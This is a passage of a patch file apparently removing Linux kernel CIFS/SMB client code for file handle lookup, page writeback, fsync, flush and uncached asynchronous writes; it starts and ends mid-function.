+-		rc = cifs_reopen_file(inv_file, false);
+-		if (!rc) {
+-			*ret_file = inv_file;
+-			return 0;
+-		}
+-
+-		spin_lock(&cifs_inode->open_file_lock);
+-		list_move_tail(&inv_file->flist, &cifs_inode->openFileList);
+-		spin_unlock(&cifs_inode->open_file_lock);
+-		cifsFileInfo_put(inv_file);
+-		++refind;
+-		inv_file = NULL;
+-		spin_lock(&cifs_inode->open_file_lock);
+-		goto refind_writable;
+-	}
+-
+-	return rc;
+-}
+-
+-struct cifsFileInfo *
+-find_writable_file(struct cifsInodeInfo *cifs_inode, int flags)
+-{
+-	struct cifsFileInfo *cfile;
+-	int rc;
+-
+-	rc = cifs_get_writable_file(cifs_inode, flags, &cfile);
+-	if (rc)
+-		cifs_dbg(FYI, "Couldn't find writable handle rc=%d\n", rc);
+-
+-	return cfile;
+-}
+-
+-int
+-cifs_get_writable_path(struct cifs_tcon *tcon, const char *name,
+-		       int flags,
+-		       struct cifsFileInfo **ret_file)
+-{
+-	struct cifsFileInfo *cfile;
+-	void *page = alloc_dentry_path();
+-
+-	*ret_file = NULL;
+-
+-	spin_lock(&tcon->open_file_lock);
+-	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+-		struct cifsInodeInfo *cinode;
+-		const char *full_path = build_path_from_dentry(cfile->dentry, page);
+-		if (IS_ERR(full_path)) {
+-			spin_unlock(&tcon->open_file_lock);
+-			free_dentry_path(page);
+-			return PTR_ERR(full_path);
+-		}
+-		if (strcmp(full_path, name))
+-			continue;
+-
+-		cinode = CIFS_I(d_inode(cfile->dentry));
+-		spin_unlock(&tcon->open_file_lock);
+-		free_dentry_path(page);
+-		return cifs_get_writable_file(cinode, flags, ret_file);
+-	}
+-
+-	spin_unlock(&tcon->open_file_lock);
+-	free_dentry_path(page);
+-	return -ENOENT;
+-}
+-
+-int
+-cifs_get_readable_path(struct cifs_tcon *tcon, const char *name,
+-		       struct cifsFileInfo **ret_file)
+-{
+-	struct cifsFileInfo *cfile;
+-	void *page = alloc_dentry_path();
+-
+-	*ret_file = NULL;
+-
+-	spin_lock(&tcon->open_file_lock);
+-	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+-		struct cifsInodeInfo *cinode;
+-		const char *full_path = build_path_from_dentry(cfile->dentry, page);
+-		if (IS_ERR(full_path)) {
+-			spin_unlock(&tcon->open_file_lock);
+-			free_dentry_path(page);
+-			return PTR_ERR(full_path);
+-		}
+-		if (strcmp(full_path, name))
+-			continue;
+-
+-		cinode = CIFS_I(d_inode(cfile->dentry));
+-		spin_unlock(&tcon->open_file_lock);
+-		free_dentry_path(page);
+-		*ret_file = find_readable_file(cinode, 0);
+-		return *ret_file ? 0 : -ENOENT;
+-	}
+-
+-	spin_unlock(&tcon->open_file_lock);
+-	free_dentry_path(page);
+-	return -ENOENT;
+-}
+-
+-void
+-cifs_writedata_release(struct kref *refcount)
+-{
+-	struct cifs_writedata *wdata = container_of(refcount,
+-					struct cifs_writedata, refcount);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	if (wdata->mr) {
+-		smbd_deregister_mr(wdata->mr);
+-		wdata->mr = NULL;
+-	}
+-#endif
+-
+-	if (wdata->cfile)
+-		cifsFileInfo_put(wdata->cfile);
+-
+-	kvfree(wdata->pages);
+-	kfree(wdata);
+-}
+-
+-/*
+- * Write failed with a retryable error. Resend the write request. It's also
+- * possible that the page was redirtied, so re-clean the page.
+- */
+-static void
+-cifs_writev_requeue(struct cifs_writedata *wdata)
+-{
+-	int i, rc = 0;
+-	struct inode *inode = d_inode(wdata->cfile->dentry);
+-	struct TCP_Server_Info *server;
+-	unsigned int rest_len;
+-
+-	server = tlink_tcon(wdata->cfile->tlink)->ses->server;
+-	i = 0;
+-	rest_len = wdata->bytes;
+-	do {
+-		struct cifs_writedata *wdata2;
+-		unsigned int j, nr_pages, wsize, tailsz, cur_len;
+-
+-		wsize = server->ops->wp_retry_size(inode);
+-		if (wsize < rest_len) {
+-			nr_pages = wsize / PAGE_SIZE;
+-			if (!nr_pages) {
+-				rc = -EOPNOTSUPP;
+-				break;
+-			}
+-			cur_len = nr_pages * PAGE_SIZE;
+-			tailsz = PAGE_SIZE;
+-		} else {
+-			nr_pages = DIV_ROUND_UP(rest_len, PAGE_SIZE);
+-			cur_len = rest_len;
+-			tailsz = rest_len - (nr_pages - 1) * PAGE_SIZE;
+-		}
+-
+-		wdata2 = cifs_writedata_alloc(nr_pages, cifs_writev_complete);
+-		if (!wdata2) {
+-			rc = -ENOMEM;
+-			break;
+-		}
+-
+-		for (j = 0; j < nr_pages; j++) {
+-			wdata2->pages[j] = wdata->pages[i + j];
+-			lock_page(wdata2->pages[j]);
+-			clear_page_dirty_for_io(wdata2->pages[j]);
+-		}
+-
+-		wdata2->sync_mode = wdata->sync_mode;
+-		wdata2->nr_pages = nr_pages;
+-		wdata2->offset = page_offset(wdata2->pages[0]);
+-		wdata2->pagesz = PAGE_SIZE;
+-		wdata2->tailsz = tailsz;
+-		wdata2->bytes = cur_len;
+-
+-		rc = cifs_get_writable_file(CIFS_I(inode), FIND_WR_ANY,
+-					    &wdata2->cfile);
+-		if (!wdata2->cfile) {
+-			cifs_dbg(VFS, "No writable handle to retry writepages rc=%d\n",
+-				 rc);
+-			if (!is_retryable_error(rc))
+-				rc = -EBADF;
+-		} else {
+-			wdata2->pid = wdata2->cfile->pid;
+-			rc = server->ops->async_writev(wdata2,
+-						       cifs_writedata_release);
+-		}
+-
+-		for (j = 0; j < nr_pages; j++) {
+-			unlock_page(wdata2->pages[j]);
+-			if (rc != 0 && !is_retryable_error(rc)) {
+-				SetPageError(wdata2->pages[j]);
+-				end_page_writeback(wdata2->pages[j]);
+-				put_page(wdata2->pages[j]);
+-			}
+-		}
+-
+-		kref_put(&wdata2->refcount, cifs_writedata_release);
+-		if (rc) {
+-			if (is_retryable_error(rc))
+-				continue;
+-			i += nr_pages;
+-			break;
+-		}
+-
+-		rest_len -= cur_len;
+-		i += nr_pages;
+-	} while (i < wdata->nr_pages);
+-
+-	/* cleanup remaining pages from the original wdata */
+-	for (; i < wdata->nr_pages; i++) {
+-		SetPageError(wdata->pages[i]);
+-		end_page_writeback(wdata->pages[i]);
+-		put_page(wdata->pages[i]);
+-	}
+-
+-	if (rc != 0 && !is_retryable_error(rc))
+-		mapping_set_error(inode->i_mapping, rc);
+-	kref_put(&wdata->refcount, cifs_writedata_release);
+-}
+-
+-void
+-cifs_writev_complete(struct work_struct *work)
+-{
+-	struct cifs_writedata *wdata = container_of(work,
+-						struct cifs_writedata, work);
+-	struct inode *inode = d_inode(wdata->cfile->dentry);
+-	int i = 0;
+-
+-	if (wdata->result == 0) {
+-		spin_lock(&inode->i_lock);
+-		cifs_update_eof(CIFS_I(inode), wdata->offset, wdata->bytes);
+-		spin_unlock(&inode->i_lock);
+-		cifs_stats_bytes_written(tlink_tcon(wdata->cfile->tlink),
+-					 wdata->bytes);
+-	} else if (wdata->sync_mode == WB_SYNC_ALL && wdata->result == -EAGAIN)
+-		return cifs_writev_requeue(wdata);
+-
+-	for (i = 0; i < wdata->nr_pages; i++) {
+-		struct page *page = wdata->pages[i];
+-
+-		if (wdata->result == -EAGAIN)
+-			__set_page_dirty_nobuffers(page);
+-		else if (wdata->result < 0)
+-			SetPageError(page);
+-		end_page_writeback(page);
+-		cifs_readpage_to_fscache(inode, page);
+-		put_page(page);
+-	}
+-	if (wdata->result != -EAGAIN)
+-		mapping_set_error(inode->i_mapping, wdata->result);
+-	kref_put(&wdata->refcount, cifs_writedata_release);
+-}
+-
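+-/* Allocate a cifs_writedata together with an array of nr_pages page pointers. */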
+-struct cifs_writedata *
+-cifs_writedata_alloc(unsigned int nr_pages, work_func_t complete)
+-{
+-	struct cifs_writedata *writedata = NULL;
+-	struct page **pages =
+-		kcalloc(nr_pages, sizeof(struct page *), GFP_NOFS);
+-	if (pages) {
+-		writedata = cifs_writedata_direct_alloc(pages, complete);
+-		if (!writedata)
+-			kvfree(pages);
+-	}
+-
+-	return writedata;
+-}
+-
+-struct cifs_writedata *
+-cifs_writedata_direct_alloc(struct page **pages, work_func_t complete)
+-{
+-	struct cifs_writedata *wdata;
+-
+-	wdata = kzalloc(sizeof(*wdata), GFP_NOFS);
+-	if (wdata != NULL) {
+-		wdata->pages = pages;
+-		kref_init(&wdata->refcount);
+-		INIT_LIST_HEAD(&wdata->list);
+-		init_completion(&wdata->done);
+-		INIT_WORK(&wdata->work, complete);
+-	}
+-	return wdata;
+-}
+-
+-static int cifs_partialpagewrite(struct page *page, unsigned from, unsigned to)
+-{
+-	struct address_space *mapping = page->mapping;
+-	loff_t offset = (loff_t)page->index << PAGE_SHIFT;
+-	char *write_data;
+-	int rc = -EFAULT;
+-	int bytes_written = 0;
+-	struct inode *inode;
+-	struct cifsFileInfo *open_file;
+-
+-	if (!mapping || !mapping->host)
+-		return -EFAULT;
+-
+-	inode = page->mapping->host;
+-
+-	offset += (loff_t)from;
+-	write_data = kmap(page);
+-	write_data += from;
+-
+-	if ((to > PAGE_SIZE) || (from > to)) {
+-		kunmap(page);
+-		return -EIO;
+-	}
+-
+-	/* racing with truncate? */
+-	if (offset > mapping->host->i_size) {
+-		kunmap(page);
+-		return 0; /* don't care */
+-	}
+-
+-	/* check to make sure that we are not extending the file */
+-	if (mapping->host->i_size - offset < (loff_t)to)
+-		to = (unsigned)(mapping->host->i_size - offset);
+-
+-	rc = cifs_get_writable_file(CIFS_I(mapping->host), FIND_WR_ANY,
+-				    &open_file);
+-	if (!rc) {
+-		bytes_written = cifs_write(open_file, open_file->pid,
+-					   write_data, to - from, &offset);
+-		cifsFileInfo_put(open_file);
+-		/* Does mm or vfs already set times? */
+-		inode->i_atime = inode->i_mtime = current_time(inode);
+-		if ((bytes_written > 0) && (offset))
+-			rc = 0;
+-		else if (bytes_written < 0)
+-			rc = bytes_written;
+-		else
+-			rc = -EFAULT;
+-	} else {
+-		cifs_dbg(FYI, "No writable handle for write page rc=%d\n", rc);
+-		if (!is_retryable_error(rc))
+-			rc = -EIO;
+-	}
+-
+-	kunmap(page);
+-	return rc;
+-}
+-
+-static struct cifs_writedata *
+-wdata_alloc_and_fillpages(pgoff_t tofind, struct address_space *mapping,
+-			  pgoff_t end, pgoff_t *index,
+-			  unsigned int *found_pages)
+-{
+-	struct cifs_writedata *wdata;
+-
+-	wdata = cifs_writedata_alloc((unsigned int)tofind,
+-				     cifs_writev_complete);
+-	if (!wdata)
+-		return NULL;
+-
+-	*found_pages = find_get_pages_range_tag(mapping, index, end,
+-				PAGECACHE_TAG_DIRTY, tofind, wdata->pages);
+-	return wdata;
+-}
+-
+-static unsigned int
+-wdata_prepare_pages(struct cifs_writedata *wdata, unsigned int found_pages,
+-		    struct address_space *mapping,
+-		    struct writeback_control *wbc,
+-		    pgoff_t end, pgoff_t *index, pgoff_t *next, bool *done)
+-{
+-	unsigned int nr_pages = 0, i;
+-	struct page *page;
+-
+-	for (i = 0; i < found_pages; i++) {
+-		page = wdata->pages[i];
+-		/*
+-		 * At this point we hold neither the i_pages lock nor the
+-		 * page lock: the page may be truncated or invalidated
+-		 * (changing page->mapping to NULL), or even swizzled
+-		 * back from swapper_space to tmpfs file mapping
+-		 */
+-
+-		if (nr_pages == 0)
+-			lock_page(page);
+-		else if (!trylock_page(page))
+-			break;
+-
+-		if (unlikely(page->mapping != mapping)) {
+-			unlock_page(page);
+-			break;
+-		}
+-
+-		if (!wbc->range_cyclic && page->index > end) {
+-			*done = true;
+-			unlock_page(page);
+-			break;
+-		}
+-
+-		if (*next && (page->index != *next)) {
+-			/* Not next consecutive page */
+-			unlock_page(page);
+-			break;
+-		}
+-
+-		if (wbc->sync_mode != WB_SYNC_NONE)
+-			wait_on_page_writeback(page);
+-
+-		if (PageWriteback(page) ||
+-				!clear_page_dirty_for_io(page)) {
+-			unlock_page(page);
+-			break;
+-		}
+-
+-		/*
+-		 * This actually clears the dirty bit in the radix tree.
+-		 * See cifs_writepage() for more commentary.
+-		 */
+-		set_page_writeback(page);
+-		if (page_offset(page) >= i_size_read(mapping->host)) {
+-			*done = true;
+-			unlock_page(page);
+-			end_page_writeback(page);
+-			break;
+-		}
+-
+-		wdata->pages[i] = page;
+-		*next = page->index + 1;
+-		++nr_pages;
+-	}
+-
+-	/* reset index to refind any pages skipped */
+-	if (nr_pages == 0)
+-		*index = wdata->pages[0]->index + 1;
+-
+-	/* put any pages we aren't going to use */
+-	for (i = nr_pages; i < found_pages; i++) {
+-		put_page(wdata->pages[i]);
+-		wdata->pages[i] = NULL;
+-	}
+-
+-	return nr_pages;
+-}
+-
+-static int
+-wdata_send_pages(struct cifs_writedata *wdata, unsigned int nr_pages,
+-		 struct address_space *mapping, struct writeback_control *wbc)
+-{
+-	int rc;
+-
+-	wdata->sync_mode = wbc->sync_mode;
+-	wdata->nr_pages = nr_pages;
+-	wdata->offset = page_offset(wdata->pages[0]);
+-	wdata->pagesz = PAGE_SIZE;
+-	wdata->tailsz = min(i_size_read(mapping->host) -
+-			page_offset(wdata->pages[nr_pages - 1]),
+-			(loff_t)PAGE_SIZE);
+-	wdata->bytes = ((nr_pages - 1) * PAGE_SIZE) + wdata->tailsz;
+-	wdata->pid = wdata->cfile->pid;
+-
+-	rc = adjust_credits(wdata->server, &wdata->credits, wdata->bytes);
+-	if (rc)
+-		return rc;
+-
+-	if (wdata->cfile->invalidHandle)
+-		rc = -EAGAIN;
+-	else
+-		rc = wdata->server->ops->async_writev(wdata,
+-						      cifs_writedata_release);
+-
+-	return rc;
+-}
+-
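+-/*
+- * Write back dirty pages in batches of contiguous pages bounded by wsize,
+- * sending each batch to the server asynchronously and redirtying the pages
+- * on retryable errors.
+- */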
+-static int cifs_writepages(struct address_space *mapping,
+-			   struct writeback_control *wbc)
+-{
+-	struct inode *inode = mapping->host;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct TCP_Server_Info *server;
+-	bool done = false, scanned = false, range_whole = false;
+-	pgoff_t end, index;
+-	struct cifs_writedata *wdata;
+-	struct cifsFileInfo *cfile = NULL;
+-	int rc = 0;
+-	int saved_rc = 0;
+-	unsigned int xid;
+-
+-	/*
+-	 * If wsize is smaller than the page cache size, default to writing
+-	 * one page at a time via cifs_writepage
+-	 */
+-	if (cifs_sb->ctx->wsize < PAGE_SIZE)
+-		return generic_writepages(mapping, wbc);
+-
+-	xid = get_xid();
+-	if (wbc->range_cyclic) {
+-		index = mapping->writeback_index; /* Start from prev offset */
+-		end = -1;
+-	} else {
+-		index = wbc->range_start >> PAGE_SHIFT;
+-		end = wbc->range_end >> PAGE_SHIFT;
+-		if (wbc->range_start == 0 && wbc->range_end == LLONG_MAX)
+-			range_whole = true;
+-		scanned = true;
+-	}
+-	server = cifs_pick_channel(cifs_sb_master_tcon(cifs_sb)->ses);
+-
+-retry:
+-	while (!done && index <= end) {
+-		unsigned int i, nr_pages, found_pages, wsize;
+-		pgoff_t next = 0, tofind, saved_index = index;
+-		struct cifs_credits credits_on_stack;
+-		struct cifs_credits *credits = &credits_on_stack;
+-		int get_file_rc = 0;
+-
+-		if (cfile)
+-			cifsFileInfo_put(cfile);
+-
+-		rc = cifs_get_writable_file(CIFS_I(inode), FIND_WR_ANY, &cfile);
+-
+-		/* in case of an error, store it to return later */
+-		if (rc)
+-			get_file_rc = rc;
+-
+-		rc = server->ops->wait_mtu_credits(server, cifs_sb->ctx->wsize,
+-						   &wsize, credits);
+-		if (rc != 0) {
+-			done = true;
+-			break;
+-		}
+-
+-		tofind = min((wsize / PAGE_SIZE) - 1, end - index) + 1;
+-
+-		wdata = wdata_alloc_and_fillpages(tofind, mapping, end, &index,
+-						  &found_pages);
+-		if (!wdata) {
+-			rc = -ENOMEM;
+-			done = true;
+-			add_credits_and_wake_if(server, credits, 0);
+-			break;
+-		}
+-
+-		if (found_pages == 0) {
+-			kref_put(&wdata->refcount, cifs_writedata_release);
+-			add_credits_and_wake_if(server, credits, 0);
+-			break;
+-		}
+-
+-		nr_pages = wdata_prepare_pages(wdata, found_pages, mapping, wbc,
+-					       end, &index, &next, &done);
+-
+-		/* nothing to write? */
+-		if (nr_pages == 0) {
+-			kref_put(&wdata->refcount, cifs_writedata_release);
+-			add_credits_and_wake_if(server, credits, 0);
+-			continue;
+-		}
+-
+-		wdata->credits = credits_on_stack;
+-		wdata->cfile = cfile;
+-		wdata->server = server;
+-		cfile = NULL;
+-
+-		if (!wdata->cfile) {
+-			cifs_dbg(VFS, "No writable handle in writepages rc=%d\n",
+-				 get_file_rc);
+-			if (is_retryable_error(get_file_rc))
+-				rc = get_file_rc;
+-			else
+-				rc = -EBADF;
+-		} else
+-			rc = wdata_send_pages(wdata, nr_pages, mapping, wbc);
+-
+-		for (i = 0; i < nr_pages; ++i)
+-			unlock_page(wdata->pages[i]);
+-
+-		/* send failure -- clean up the mess */
+-		if (rc != 0) {
+-			add_credits_and_wake_if(server, &wdata->credits, 0);
+-			for (i = 0; i < nr_pages; ++i) {
+-				if (is_retryable_error(rc))
+-					redirty_page_for_writepage(wbc,
+-							   wdata->pages[i]);
+-				else
+-					SetPageError(wdata->pages[i]);
+-				end_page_writeback(wdata->pages[i]);
+-				put_page(wdata->pages[i]);
+-			}
+-			if (!is_retryable_error(rc))
+-				mapping_set_error(mapping, rc);
+-		}
+-		kref_put(&wdata->refcount, cifs_writedata_release);
+-
+-		if (wbc->sync_mode == WB_SYNC_ALL && rc == -EAGAIN) {
+-			index = saved_index;
+-			continue;
+-		}
+-
+-		/* Return immediately if we received a signal during writing */
+-		if (is_interrupt_error(rc)) {
+-			done = true;
+-			break;
+-		}
+-
+-		if (rc != 0 && saved_rc == 0)
+-			saved_rc = rc;
+-
+-		wbc->nr_to_write -= nr_pages;
+-		if (wbc->nr_to_write <= 0)
+-			done = true;
+-
+-		index = next;
+-	}
+-
+-	if (!scanned && !done) {
+-		/*
+-		 * We hit the last page and there is more work to be done: wrap
+-		 * back to the start of the file
+-		 */
+-		scanned = true;
+-		index = 0;
+-		goto retry;
+-	}
+-
+-	if (saved_rc != 0)
+-		rc = saved_rc;
+-
+-	if (wbc->range_cyclic || (range_whole && wbc->nr_to_write > 0))
+-		mapping->writeback_index = index;
+-
+-	if (cfile)
+-		cifsFileInfo_put(cfile);
+-	free_xid(xid);
+-	/* Indication to update ctime and mtime as close is deferred */
+-	set_bit(CIFS_INO_MODIFIED_ATTR, &CIFS_I(inode)->flags);
+-	return rc;
+-}
+-
+-static int
+-cifs_writepage_locked(struct page *page, struct writeback_control *wbc)
+-{
+-	int rc;
+-	unsigned int xid;
+-
+-	xid = get_xid();
+-/* BB add check for wbc flags */
+-	get_page(page);
+-	if (!PageUptodate(page))
+-		cifs_dbg(FYI, "ppw - page not up to date\n");
+-
+-	/*
+-	 * Set the "writeback" flag, and clear "dirty" in the radix tree.
+-	 *
+-	 * A writepage() implementation always needs to do either this,
+-	 * or re-dirty the page with "redirty_page_for_writepage()" in
+-	 * the case of a failure.
+-	 *
+-	 * Just unlocking the page will cause the radix tree tag-bits
+-	 * to fail to update with the state of the page correctly.
+-	 */
+-	set_page_writeback(page);
+-retry_write:
+-	rc = cifs_partialpagewrite(page, 0, PAGE_SIZE);
+-	if (is_retryable_error(rc)) {
+-		if (wbc->sync_mode == WB_SYNC_ALL && rc == -EAGAIN)
+-			goto retry_write;
+-		redirty_page_for_writepage(wbc, page);
+-	} else if (rc != 0) {
+-		SetPageError(page);
+-		mapping_set_error(page->mapping, rc);
+-	} else {
+-		SetPageUptodate(page);
+-	}
+-	end_page_writeback(page);
+-	put_page(page);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static int cifs_writepage(struct page *page, struct writeback_control *wbc)
+-{
+-	int rc = cifs_writepage_locked(page, wbc);
+-	unlock_page(page);
+-	return rc;
+-}
+-
+-static int cifs_write_end(struct file *file, struct address_space *mapping,
+-			loff_t pos, unsigned len, unsigned copied,
+-			struct page *page, void *fsdata)
+-{
+-	int rc;
+-	struct inode *inode = mapping->host;
+-	struct cifsFileInfo *cfile = file->private_data;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(cfile->dentry->d_sb);
+-	__u32 pid;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
+-		pid = cfile->pid;
+-	else
+-		pid = current->tgid;
+-
+-	cifs_dbg(FYI, "write_end for page %p from pos %lld with %d bytes\n",
+-		 page, pos, copied);
+-
+-	if (PageChecked(page)) {
+-		if (copied == len)
+-			SetPageUptodate(page);
+-		ClearPageChecked(page);
+-	} else if (!PageUptodate(page) && copied == PAGE_SIZE)
+-		SetPageUptodate(page);
+-
+-	if (!PageUptodate(page)) {
+-		char *page_data;
+-		unsigned offset = pos & (PAGE_SIZE - 1);
+-		unsigned int xid;
+-
+-		xid = get_xid();
+-		/* this is probably better than directly calling
+-		   partialpage_write since in this function the file handle is
+-		   known, which we might as well leverage */
+-		/* BB check if anything else is missing out of ppw,
+-		   such as updating the last write time */
+-		page_data = kmap(page);
+-		rc = cifs_write(cfile, pid, page_data + offset, copied, &pos);
+-		/* if (rc < 0) should we set writebehind rc? */
+-		kunmap(page);
+-
+-		free_xid(xid);
+-	} else {
+-		rc = copied;
+-		pos += copied;
+-		set_page_dirty(page);
+-	}
+-
+-	if (rc > 0) {
+-		spin_lock(&inode->i_lock);
+-		if (pos > inode->i_size) {
+-			i_size_write(inode, pos);
+-			inode->i_blocks = (512 - 1 + pos) >> 9;
+-		}
+-		spin_unlock(&inode->i_lock);
+-	}
+-
+-	unlock_page(page);
+-	put_page(page);
+-	/* Indication to update ctime and mtime as close is deferred */
+-	set_bit(CIFS_INO_MODIFIED_ATTR, &CIFS_I(inode)->flags);
+-
+-	return rc;
+-}
+-
+-int cifs_strict_fsync(struct file *file, loff_t start, loff_t end,
+-		      int datasync)
+-{
+-	unsigned int xid;
+-	int rc = 0;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct cifsFileInfo *smbfile = file->private_data;
+-	struct inode *inode = file_inode(file);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-
+-	rc = file_write_and_wait_range(file, start, end);
+-	if (rc) {
+-		trace_cifs_fsync_err(inode->i_ino, rc);
+-		return rc;
+-	}
+-
+-	xid = get_xid();
+-
+-	cifs_dbg(FYI, "Sync file - name: %pD datasync: 0x%x\n",
+-		 file, datasync);
+-
+-	if (!CIFS_CACHE_READ(CIFS_I(inode))) {
+-		rc = cifs_zap_mapping(inode);
+-		if (rc) {
+-			cifs_dbg(FYI, "rc: %d during invalidate phase\n", rc);
+-			rc = 0; /* don't care about it in fsync */
+-		}
+-	}
+-
+-	tcon = tlink_tcon(smbfile->tlink);
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOSSYNC)) {
+-		server = tcon->ses->server;
+-		if (server->ops->flush == NULL) {
+-			rc = -ENOSYS;
+-			goto strict_fsync_exit;
+-		}
+-
+-		if ((OPEN_FMODE(smbfile->f_flags) & FMODE_WRITE) == 0) {
+-			smbfile = find_writable_file(CIFS_I(inode), FIND_WR_ANY);
+-			if (smbfile) {
+-				rc = server->ops->flush(xid, tcon, &smbfile->fid);
+-				cifsFileInfo_put(smbfile);
+-			} else
+-				cifs_dbg(FYI, "ignore fsync for file not open for write\n");
+-		} else
+-			rc = server->ops->flush(xid, tcon, &smbfile->fid);
+-	}
+-
+-strict_fsync_exit:
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-int cifs_fsync(struct file *file, loff_t start, loff_t end, int datasync)
+-{
+-	unsigned int xid;
+-	int rc = 0;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct cifsFileInfo *smbfile = file->private_data;
+-	struct inode *inode = file_inode(file);
+-	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
+-
+-	rc = file_write_and_wait_range(file, start, end);
+-	if (rc) {
+-		trace_cifs_fsync_err(file_inode(file)->i_ino, rc);
+-		return rc;
+-	}
+-
+-	xid = get_xid();
+-
+-	cifs_dbg(FYI, "Sync file - name: %pD datasync: 0x%x\n",
+-		 file, datasync);
+-
+-	tcon = tlink_tcon(smbfile->tlink);
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOSSYNC)) {
+-		server = tcon->ses->server;
+-		if (server->ops->flush == NULL) {
+-			rc = -ENOSYS;
+-			goto fsync_exit;
+-		}
+-
+-		if ((OPEN_FMODE(smbfile->f_flags) & FMODE_WRITE) == 0) {
+-			smbfile = find_writable_file(CIFS_I(inode), FIND_WR_ANY);
+-			if (smbfile) {
+-				rc = server->ops->flush(xid, tcon, &smbfile->fid);
+-				cifsFileInfo_put(smbfile);
+-			} else
+-				cifs_dbg(FYI, "ignore fsync for file not open for write\n");
+-		} else
+-			rc = server->ops->flush(xid, tcon, &smbfile->fid);
+-	}
+-
+-fsync_exit:
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-/*
+- * As the file closes, flush all cached write data for this inode, checking
+- * for write-behind errors.
+- */
+-int cifs_flush(struct file *file, fl_owner_t id)
+-{
+-	struct inode *inode = file_inode(file);
+-	int rc = 0;
+-
+-	if (file->f_mode & FMODE_WRITE)
+-		rc = filemap_write_and_wait(inode->i_mapping);
+-
+-	cifs_dbg(FYI, "Flush inode %p file %p rc %d\n", inode, file, rc);
+-	if (rc) {
+-		/* get more nuanced writeback errors */
+-		rc = filemap_check_wb_err(file->f_mapping, 0);
+-		trace_cifs_flush_err(inode->i_ino, rc);
+-	}
+-	return rc;
+-}
+-
+-static int
+-cifs_write_allocate_pages(struct page **pages, unsigned long num_pages)
+-{
+-	int rc = 0;
+-	unsigned long i;
+-
+-	for (i = 0; i < num_pages; i++) {
+-		pages[i] = alloc_page(GFP_KERNEL|__GFP_HIGHMEM);
+-		if (!pages[i]) {
+-			/*
+-			 * save the number of pages we have already allocated
+-			 * and return with an ENOMEM error
+-			 */
+-			num_pages = i;
+-			rc = -ENOMEM;
+-			break;
+-		}
+-	}
+-
+-	if (rc) {
+-		for (i = 0; i < num_pages; i++)
+-			put_page(pages[i]);
+-	}
+-	return rc;
+-}
+-
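+-/*
+- * Return the number of pages needed to hold min(len, wsize) bytes and store
+- * the clamped length in *cur_len.
+- */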
+-static inline
+-size_t get_numpages(const size_t wsize, const size_t len, size_t *cur_len)
+-{
+-	size_t num_pages;
+-	size_t clen;
+-
+-	clen = min_t(const size_t, len, wsize);
+-	num_pages = DIV_ROUND_UP(clen, PAGE_SIZE);
+-
+-	if (cur_len)
+-		*cur_len = clen;
+-
+-	return num_pages;
+-}
+-
+-static void
+-cifs_uncached_writedata_release(struct kref *refcount)
+-{
+-	int i;
+-	struct cifs_writedata *wdata = container_of(refcount,
+-					struct cifs_writedata, refcount);
+-
+-	kref_put(&wdata->ctx->refcount, cifs_aio_ctx_release);
+-	for (i = 0; i < wdata->nr_pages; i++)
+-		put_page(wdata->pages[i]);
+-	cifs_writedata_release(refcount);
+-}
+-
+-static void collect_uncached_write_data(struct cifs_aio_ctx *ctx);
+-
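+-/*
+- * Completion handler for uncached async writes: update the cached EOF and
+- * i_size, signal completion, and let the collector gather the result.
+- */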
+-static void
+-cifs_uncached_writev_complete(struct work_struct *work)
+-{
+-	struct cifs_writedata *wdata = container_of(work,
+-					struct cifs_writedata, work);
+-	struct inode *inode = d_inode(wdata->cfile->dentry);
+-	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+-
+-	spin_lock(&inode->i_lock);
+-	cifs_update_eof(cifsi, wdata->offset, wdata->bytes);
+-	if (cifsi->server_eof > inode->i_size)
+-		i_size_write(inode, cifsi->server_eof);
+-	spin_unlock(&inode->i_lock);
+-
+-	complete(&wdata->done);
+-	collect_uncached_write_data(wdata->ctx);
+-	/* the call below can possibly free the last ref to the aio ctx */
+-	kref_put(&wdata->refcount, cifs_uncached_writedata_release);
+-}
+-
+-static int
+-wdata_fill_from_iovec(struct cifs_writedata *wdata, struct iov_iter *from,
+-		      size_t *len, unsigned long *num_pages)
+-{
+-	size_t save_len, copied, bytes, cur_len = *len;
+-	unsigned long i, nr_pages = *num_pages;
+-
+-	save_len = cur_len;
+-	for (i = 0; i < nr_pages; i++) {
+-		bytes = min_t(const size_t, cur_len, PAGE_SIZE);
+-		copied = copy_page_from_iter(wdata->pages[i], 0, bytes, from);
+-		cur_len -= copied;
+-		/*
+-		 * If we didn't copy as much as we expected, then that
+-		 * may mean we trod into an unmapped area. Stop copying
+-		 * at that point. On the next pass through the big
+-		 * loop, we'll likely end up getting a zero-length
+-		 * write and bailing out of it.
+-		 */
+-		if (copied < bytes)
+-			break;
+-	}
+-	cur_len = save_len - cur_len;
+-	*len = cur_len;
+-
+-	/*
+-	 * If we have no data to send, then that probably means that
+-	 * the copy above failed altogether. That's most likely because
+-	 * the address in the iovec was bogus. Return -EFAULT and let
+-	 * the caller free anything we allocated and bail out.
+-	 */
+-	if (!cur_len)
+-		return -EFAULT;
+-
+-	/*
+-	 * i + 1 now represents the number of pages we actually used in
+-	 * the copy phase above.
+-	 */
+-	*num_pages = i + 1;
+-	return 0;
+-}
+-
+-static int
+-cifs_resend_wdata(struct cifs_writedata *wdata, struct list_head *wdata_list,
+-	struct cifs_aio_ctx *ctx)
+-{
+-	unsigned int wsize;
+-	struct cifs_credits credits;
+-	int rc;
+-	struct TCP_Server_Info *server = wdata->server;
+-
+-	do {
+-		if (wdata->cfile->invalidHandle) {
+-			rc = cifs_reopen_file(wdata->cfile, false);
+-			if (rc == -EAGAIN)
+-				continue;
+-			else if (rc)
+-				break;
+-		}
+-
+-		/*
+-		 * Wait for credits to resend this wdata.
+-		 * Note: we are attempting to resend the whole wdata, not in
+-		 * segments.
+-		 */
